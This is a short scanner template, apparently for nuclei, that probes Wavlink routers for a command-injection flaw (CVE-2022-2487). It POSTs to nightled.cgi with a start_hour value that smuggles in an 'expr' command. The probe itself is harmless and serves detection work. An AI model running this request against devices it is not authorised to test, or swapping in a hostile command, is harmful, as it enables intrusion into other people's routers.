id: poc-yaml-wavlink-nightled-remote-command-execute

info:
  name: poc-yaml-wavlink-nightled-remote-command-execute
  author: we1x4n
  severity: critical
  tags: xray-converted,rce,ct-459338
  reference:
    - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-2487.yaml

http:
  - raw:
      - |
        POST /cgi-bin/nightled.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=night_led&start_hour=;expr {{rand_int(1000, 9999)}} - {{rand_int(1000, 9999)}};

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "200 OK"